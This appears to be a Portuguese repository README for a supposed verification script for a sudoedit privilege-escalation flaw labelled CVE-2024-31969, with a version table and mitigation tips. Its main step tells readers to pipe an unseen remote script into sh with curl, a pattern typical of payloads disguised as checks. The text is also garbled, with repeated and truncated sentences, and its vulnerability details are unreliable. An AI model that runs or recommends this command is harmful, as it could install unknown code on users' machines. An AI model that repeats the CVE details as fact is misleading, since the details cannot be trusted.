
Fornece um script de verificação de prova de conceito e documentação para CVE-2024-31969, uma escalada local de privilégios no sudoedit do sudo, incluindo versões afetadas e orientações de mitigação.
CVE-2024-31969 é uma vulnerabilidade de escalonamento de privilégios local no sudo ao usar o comando sudoedit.
Essa vulnerabilidade foi introduzida desde o sudo 1.9.0 devido à forma como o sudoedit valida as variáveis de ambiente do usuário e a propriedade dos arquivos de forma inadequada.
Uma falha introduzida no sudo 1.9.0 na forma como o
sudoeditvalidava as variáveis de ambiente e a propriedade dos arquivos dos usuários.
Essa vulnerabilidade permite que um usuário local com acesso ao sudoedit modifique arquivos arbitrários como root por meio da manipulação de variáveis de ambiente como SUDO_EDITOR, ou aproveitando-se de symlinks.
| Versão do Sudo | Status |
|---|---|
| 1.9.0 → 1.9.15p4 | 🔥 Vulnerável |
| 1.9.15p5 ou superior | ✅ Seguro |
| 1.8.x (incluindo 1.8.23) | ❌ Não afetado |
Execute o seguinte comando:
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh
sudo para a versão 1.9.15p5 ou mais recente.sudoers que permitem sudoedit para usuários não-root.env_keep ou env_reset no arquivo /etc/sudoers.Este repositório foi criado para fins de educação e documentação de segurança de sistemas.
É estritamente proibido usar estas informações para atividades ilegais ou sem autorização por escrito do proprietário do sistema.
Qualquer forma de uso indevido é de total responsabilidade do usuário.